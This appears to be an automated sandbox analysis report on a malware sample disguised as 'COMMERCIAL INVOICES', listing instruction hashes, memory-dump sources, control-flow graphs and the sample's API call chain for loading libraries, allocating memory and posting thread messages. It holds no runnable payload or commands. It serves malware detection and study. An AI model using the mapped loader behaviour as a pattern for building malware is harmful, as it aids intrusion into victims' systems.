                                                                                                                                                                                                                                      • Opcode ID: 3cdc7bc6dcf395297ab1a01a02991684b74457e07b7a1db3b38165eaf20f8ab3
                                                                                                                                                                                                                                      • Instruction ID: c62e077e096185c47d9ee0d84e066cce651544550ef2cd555f3f980fabcdd87f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cdc7bc6dcf395297ab1a01a02991684b74457e07b7a1db3b38165eaf20f8ab3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97E1F7B5E001198FCB14DFA9C580AAEFBB2BF89305F24D169D818AB356D731AD41CF61
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: fd6840009b90c663686b342992f75263c981fdeb1f276cf858db82431a204e2b
                                                                                                                                                                                                                                      • Instruction ID: b99100f0be5121b71a729f29aafa8a4727ef25fa3e450a787993448b4d46395f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd6840009b90c663686b342992f75263c981fdeb1f276cf858db82431a204e2b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9BE107B4E006199FCB14DFA9C5809AEFBB2BF89305F24D169D818AB356D731AD41CF60
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: bbf87ab55c63f2d03fd3daffa48e038eb45905f1e509d6d5526489bb46936b2e
                                                                                                                                                                                                                                      • Instruction ID: b1a62014637a53142d7e21d0bb2f9995b2a5ec9357cf50ea111d708c2e76d6a2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbf87ab55c63f2d03fd3daffa48e038eb45905f1e509d6d5526489bb46936b2e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5E109B4E001198FDB14DFA9C590AAEFBB2BF89305F24D169D814AB356D731AE41CF60
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2378013072.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2ba0000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 63abfc1b632c62d25086c440a6ba30d3dbc51a49551336ce9038c2af44b61a1a
                                                                                                                                                                                                                                      • Instruction ID: b48250ca250dd9fd5556f3ee959fc5a88d486497314313bfe2cc45ee0b1e4971
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63abfc1b632c62d25086c440a6ba30d3dbc51a49551336ce9038c2af44b61a1a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07A16D32E042058FCF15DFB5C8945EEB7B2FF85304B1585AAE805AB265DB32E955CF80
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2503711c64dbac121fdcc751a5ec93eb0246d8d23984d3a19348d56ec18d17b3
                                                                                                                                                                                                                                      • Instruction ID: f60d425cec0dba6a6a7cf9ce1a4064309bae7bda2c3ff077ced581f034272b60
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2503711c64dbac121fdcc751a5ec93eb0246d8d23984d3a19348d56ec18d17b3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC514DB0D046599FCB15CFA9C9805AEFBB2BF89305F24C1A9D408AB256D7319E41CF61
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9db34f9bc6ca8910f18fc22adba778789755c3edd544fa71b94c24dc7e2bccbd
                                                                                                                                                                                                                                      • Instruction ID: b66257d42e1c86d1fc7002930778332142d63e2325d977486f80c5382e923a76
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9db34f9bc6ca8910f18fc22adba778789755c3edd544fa71b94c24dc7e2bccbd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5251FAB1E002198FDB15DFA9C9805AEFBF2BF89305F24C169D418A7256D7319E42CFA1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3c872eb214dd674b60dd096b6de824f8c15c8b84426d1d780c658e6108a38bda
                                                                                                                                                                                                                                      • Instruction ID: 50a02bb9edffa3d7b9498d56abd3f8f9f955052f763e58d9549805428f7a42c1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c872eb214dd674b60dd096b6de824f8c15c8b84426d1d780c658e6108a38bda
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF5118B4E002198BDB15DFA9C9805AEFBB2BF89305F24C169D408AB356D7319E41CFA1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f227b6819fdf9e7169937aec462225f90a71de7ab620d5eb75727e3e01372351
                                                                                                                                                                                                                                      • Instruction ID: 4985a816c470281a2395b46293f6a12e5e7c6fc86bcfa003ee9f21a27b91f62c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f227b6819fdf9e7169937aec462225f90a71de7ab620d5eb75727e3e01372351
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5510DB1E006198BCB14DFA9C5805AEFBF2FF89305F24C169D418AB256D7319E41CFA1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7b6e4a1373262fbf11e8b24a20eefc41a223d53e6b69ee01854c98e1a0a1dd6e
                                                                                                                                                                                                                                      • Instruction ID: 91a7678a6aaed5a91b279b30bbf19273b7f2327c71c2e23ffd76dcfdb5fd2360
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b6e4a1373262fbf11e8b24a20eefc41a223d53e6b69ee01854c98e1a0a1dd6e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 323139B5E18249CBDB08CFAAD4816EDFBF2EB8E310F14C16AD408A7291D7349585CB50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 1c21d2b3637885354a80eed599717dd7c3ae1be2030ee2983332869aaaa82d83
                                                                                                                                                                                                                                      • Instruction ID: 6056939940f59e193525ce503b285d2147de76fef68ec2bd6024c06e391e9275
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c21d2b3637885354a80eed599717dd7c3ae1be2030ee2983332869aaaa82d83
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E031C7B1E056288BEB18CF6BC9053DDFAF7AFC9305F04C0AAC40CAA264DB750955CE41

                                                                                                                                                                                                                                      Execution Graph

Execution Coverage: 1.2%
Dynamic/Decrypted Code Coverage: 4.8%
Signature Coverage: 7.6%
Total number of Nodes: 145
Total number of Limit Nodes: 12
                                                                                                                                                                                                                                      execution_graph 93593 4249e3 93598 4249fc 93593->93598 93594 424a89 93595 424a44 93601 42e3c3 93595->93601 93598->93594 93598->93595 93599 424a84 93598->93599 93600 42e3c3 RtlFreeHeap 93599->93600 93600->93594 93604 42c653 93601->93604 93603 424a54 93605 42c670 93604->93605 93606 42c681 RtlFreeHeap 93605->93606 93606->93603 93607 413780 93608 413799 93607->93608 93610 4136fe 93607->93610 93609 413768 93610->93609 93613 42c563 93610->93613 93614 42c57d 93613->93614 93617 1282c70 LdrInitializeThunk 93614->93617 93615 413715 93617->93615 93618 42f583 93619 42f593 93618->93619 93620 42f599 93618->93620 93623 42e4a3 93620->93623 93622 42f5bf 93626 42c603 93623->93626 93625 42e4be 93625->93622 93627 42c61d 93626->93627 93628 42c62e RtlAllocateHeap 93627->93628 93628->93625 93629 42b8a3 93630 42b8bd 93629->93630 93633 1282df0 LdrInitializeThunk 93630->93633 93631 42b8e5 93633->93631 93742 424653 93743 42466f 93742->93743 93744 424697 93743->93744 93745 4246ab 93743->93745 93746 42c2d3 NtClose 93744->93746 93747 42c2d3 NtClose 93745->93747 93748 4246a0 93746->93748 93749 4246b4 93747->93749 93752 42e4e3 RtlAllocateHeap 93749->93752 93751 4246bf 93752->93751 93634 413c63 93635 413c7d 93634->93635 93640 417413 93635->93640 93637 413c9b 93638 413ce0 93637->93638 93639 413ccf PostThreadMessageW 93637->93639 93639->93638 93641 417437 93640->93641 93642 417473 LdrLoadDll 93641->93642 93643 41743e 93641->93643 93642->93643 93643->93637 93644 411683 93645 411698 93644->93645 93650 413973 93645->93650 93649 4116b1 93651 413999 93650->93651 93653 4116a4 93651->93653 93657 4136f3 LdrInitializeThunk 93651->93657 93653->93649 93654 42c2d3 93653->93654 93655 42c2ed 93654->93655 93656 42c2fe NtClose 93655->93656 93656->93649 93657->93653 93753 418a73 93754 
418aa3 93753->93754 93756 418acf 93754->93756 93757 41af33 93754->93757 93758 41af77 93757->93758 93759 41af98 93758->93759 93760 42c2d3 NtClose 93758->93760 93759->93754 93760->93759 93761 41a1d3 93762 41a1eb 93761->93762 93764 41a245 93761->93764 93762->93764 93765 41e133 93762->93765 93766 41e159 93765->93766 93770 41e250 93766->93770 93771 42f6b3 93766->93771 93768 41e1ee 93769 42b8f3 LdrInitializeThunk 93768->93769 93768->93770 93769->93770 93770->93764 93772 42f623 93771->93772 93773 42f680 93772->93773 93774 42e4a3 RtlAllocateHeap 93772->93774 93773->93768 93775 42f65d 93774->93775 93776 42e3c3 RtlFreeHeap 93775->93776 93776->93773 93658 401a46 93659 401a54 93658->93659 93659->93659 93662 42fa53 93659->93662 93665 42df73 93662->93665 93666 42df99 93665->93666 93677 4071e3 93666->93677 93668 42dfaf 93669 401b04 93668->93669 93680 41ad43 93668->93680 93671 42dfce 93672 42dfe3 93671->93672 93695 42c6a3 93671->93695 93691 427f73 93672->93691 93675 42dffd 93676 42c6a3 ExitProcess 93675->93676 93676->93669 93698 4160d3 93677->93698 93679 4071f0 93679->93668 93681 41ad6f 93680->93681 93716 41ac33 93681->93716 93684 41ad9c 93685 42c2d3 NtClose 93684->93685 93689 41ada7 93684->93689 93685->93689 93686 41add0 93686->93671 93687 41adb4 93687->93686 93688 42c2d3 NtClose 93687->93688 93690 41adc6 93688->93690 93689->93671 93690->93671 93692 427fd4 93691->93692 93694 427fe1 93692->93694 93727 418283 93692->93727 93694->93675 93696 42c6c0 93695->93696 93697 42c6d1 ExitProcess 93696->93697 93697->93672 93699 4160f0 93698->93699 93701 416109 93699->93701 93702 42cd53 93699->93702 93701->93679 93703 42cd6d 93702->93703 93704 42cd9c 93703->93704 93709 42b8f3 93703->93709 93704->93701 93707 42e3c3 RtlFreeHeap 93708 42ce15 93707->93708 93708->93701 93710 42b90d 93709->93710 93713 1282c0a 93710->93713 93711 42b939 93711->93707 93714 1282c1f LdrInitializeThunk 93713->93714 93715 1282c11 93713->93715 93714->93711 93715->93711 93717 41ad29 93716->93717 93718 41ac4d 93716->93718 
93717->93684 93717->93687 93722 42b993 93718->93722 93721 42c2d3 NtClose 93721->93717 93723 42b9ad 93722->93723 93726 12835c0 LdrInitializeThunk 93723->93726 93724 41ad1d 93724->93721 93726->93724 93729 4182ad 93727->93729 93728 4187ab 93728->93694 93729->93728 93735 4138d3 93729->93735 93731 4183da 93731->93728 93732 42e3c3 RtlFreeHeap 93731->93732 93733 4183f2 93732->93733 93733->93728 93734 42c6a3 ExitProcess 93733->93734 93734->93728 93737 4138f3 93735->93737 93738 41395c 93737->93738 93740 41b053 RtlFreeHeap LdrInitializeThunk 93737->93740 93738->93731 93739 413952 93739->93731 93740->93739 93741 1282b60 LdrInitializeThunk

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
control_flow_graph (function starting at 417413)
• Nodes (basic blocks):
• 209: 417413-41743c, call 42f0c3
• 212: 417442-417450, call 42f6c3
• 213: 41743e-417441
• 216: 417460-417471, call 42da43
• 217: 417452-41745d, call 42f963
• 222: 417473-417487, LdrLoadDll
• 223: 41748a-41748d
• Edges: 209->212, 209->213, 212->216, 212->217, 216->222, 216->223, 217->216, 222->223
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417485
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Load
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                                                                                                                      • Opcode ID: 5dcbc6baf4d259431639129e786eea26c350e9648a9a52f79217b35080b91802
                                                                                                                                                                                                                                      • Instruction ID: e2f4adb055e614b17f7a8f9d9b519583d9b4e97fe9e6ebd22647c561ca6d8ebe
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5dcbc6baf4d259431639129e786eea26c350e9648a9a52f79217b35080b91802
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA015EB1E4020DABDB10DAE1DC42FDEB7789B54308F4041AAE90897241F674EB488B95

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
control_flow_graph (function starting at 42c2d3)
• Nodes (basic blocks):
• 229: 42c2d3-42c30c, call 404563, call 42d543, NtClose
• Edges: none (single block)
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C307
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                                                                                                      • Opcode ID: febe32e7eea80cbd433ec382fcb712a4c5645aad6e5cf033f31accf23b9c9390
                                                                                                                                                                                                                                      • Instruction ID: 4598b5e4a1033670ebfc613ee9756e7837bcf548e0a1add36e41a53082609fef
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: febe32e7eea80cbd433ec382fcb712a4c5645aad6e5cf033f31accf23b9c9390
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8E086352403147BD650FA5ADC41F97775CDFC5754F404019FA0867181C6B1BA01C7F4

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 243 1282b60-1282b6c LdrInitializeThunk
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 2c6845b6c830b748cba9326b51a25a252c2da44396ec898d1de87f01ea81bb74
                                                                                                                                                                                                                                      • Instruction ID: a0ccd530de65f285a440642fa623a8cff94bc64e92eba4b1b4c3a454f197506b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c6845b6c830b748cba9326b51a25a252c2da44396ec898d1de87f01ea81bb74
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD900261212404034605715C4414616400A97E1201B59C021E2018590DC52989916229

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 245 1282df0-1282dfc LdrInitializeThunk
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: b9bfb85ecf557f65afe96b1d4d7b0332d0bb3e5b30a39eb7006aabbb8a200c01
                                                                                                                                                                                                                                      • Instruction ID: 0669751170a525cc7054e4d5292200b2ce7d41ec890a0f678acadc894c2e40e2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9bfb85ecf557f65afe96b1d4d7b0332d0bb3e5b30a39eb7006aabbb8a200c01
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D90023121140813D611715C4504707000997D1241F99C412A1428558DD65A8A52A225

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 244 1282c70-1282c7c LdrInitializeThunk
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 3f841b1b0fdf17bdf4ef14f4632e3ea1af28113bee1e743f1c1b70e9d3a8c883
                                                                                                                                                                                                                                      • Instruction ID: 2a9c6862828db617c7eb499843b53072c44ae9fe28bc637d545a7e50c38cb2aa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f841b1b0fdf17bdf4ef14f4632e3ea1af28113bee1e743f1c1b70e9d3a8c883
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4390023121148C02D610715C840474A000597D1301F5DC411A5428658DC69989917225
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 10d8224abb062cde60fb48977f2f5b62e5fe53128f36aa02b768369daf60cd6c
                                                                                                                                                                                                                                      • Instruction ID: ee5f8d20e7ce5026907c10ea84bc70802c39f7805770af2bcf9fed0dbec25557
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10d8224abb062cde60fb48977f2f5b62e5fe53128f36aa02b768369daf60cd6c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA90023161550802D600715C4514706100597D1201F69C411A1428568DC7998A5166A6

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • PostThreadMessageW.USER32(2636-l0,00000111,00000000,00000000), ref: 00413CDA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                                                                                                                      • String ID: 2636-l0$2636-l0
                                                                                                                                                                                                                                      • API String ID: 1836367815-1971679396
                                                                                                                                                                                                                                      • Opcode ID: fe0b0fde2066830886931e99d926b35beca9fe550bd22d31d98ca82f5d4cf294
                                                                                                                                                                                                                                      • Instruction ID: 6b296ec2e4225bc39ac9137ca907657d14a3ff643f00039ac8e10a0b62862b18
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe0b0fde2066830886931e99d926b35beca9fe550bd22d31d98ca82f5d4cf294
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04112972E4011D7EDB01AAA59C81DEF7F6CDF41698F04846AF900A7241E6398E0687E5

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 16 413c60-413c75 17 413c7d-413ccd call 42ee73 call 417413 call 4044d3 call 424b03 16->17 18 413c78 call 42e463 16->18 27 413ced-413cf3 17->27 28 413ccf-413cde PostThreadMessageW 17->28 18->17 28->27 29 413ce0-413cea 28->29 29->27
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • PostThreadMessageW.USER32(2636-l0,00000111,00000000,00000000), ref: 00413CDA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                                                                                                                      • String ID: 2636-l0$2636-l0
                                                                                                                                                                                                                                      • API String ID: 1836367815-1971679396
                                                                                                                                                                                                                                      • Opcode ID: f7335a4b2c943aeb5b5e2b9d6c649ed8104770c8651fb65c495380f6116aec95
                                                                                                                                                                                                                                      • Instruction ID: 5f4406f0e4de0b3dfe4f388cd0b4aa32fac0830c3daf58662237cd0961209bdc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7335a4b2c943aeb5b5e2b9d6c649ed8104770c8651fb65c495380f6116aec95
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D01C872D4021C7AEB10AAD59C82DEF7F7CDF41698F048069FA1477141D6785E064BA5

Control-flow Graph (legend: Executed / Not Executed)
control_flow_graph 30 413c63-413c75 31 413c7d-413ccd call 42ee73 call 417413 call 4044d3 call 424b03 30->31 32 413c78 call 42e463 30->32 41 413ced-413cf3 31->41 42 413ccf-413cde PostThreadMessageW 31->42 32->31 42->41 43 413ce0-413cea 42->43 43->41
APIs
• PostThreadMessageW.USER32(2636-l0,00000111,00000000,00000000), ref: 00413CDA
Strings
Memory Dump Source
• Source File: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_COMMERCIAL INVOICES.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: 2636-l0$2636-l0
• API String ID: 1836367815-1971679396
• Opcode ID: b4662b19418b140157cd0eaaf848162852b4a27cf2d4f3b5962adba5849ba92b
• Instruction ID: 45b883e6a5aaee5c2d591038c8df68d750626b4cd5d5896ce137520db01301b1
• Opcode Fuzzy Hash: b4662b19418b140157cd0eaaf848162852b4a27cf2d4f3b5962adba5849ba92b
• Instruction Fuzzy Hash: DE01C872D4011C7ADB10AAD59C81DEF7F7CDF40698F048069FA1477141D6785E064BA5

Control-flow Graph (legend: Executed / Not Executed)
control_flow_graph 44 4174ae-4174af 45 4174b1-4174f2 44->45 46 41744b-417450 44->46 49 4174f4-4174fa 45->49 50 4174fb-417513 45->50 47 417460-417471 call 42da43 46->47 48 417452-41745d call 42f963 46->48 59 417473-417487 LdrLoadDll 47->59 60 41748a-41748d 47->60 48->47 49->50 51 417515-417516 50->51 52 41755f-417561 50->52 55 417518-41751a 51->55 56 41756c-417571 51->56 52->56 61 41752b-41755d 55->61 62 41751d-41752a 55->62 59->60 61->52 62->61
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417485
Strings
Memory Dump Source
• Source File: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_COMMERCIAL INVOICES.jbxd
Yara matches
Similarity
• API ID: Load
• String ID: 6v
• API String ID: 2234796835-3628208636
• Opcode ID: 7fca55cfca3f4642834bdcb50ebb40f9ae7e426c7c5bf9cbfb610512ed6e1b90
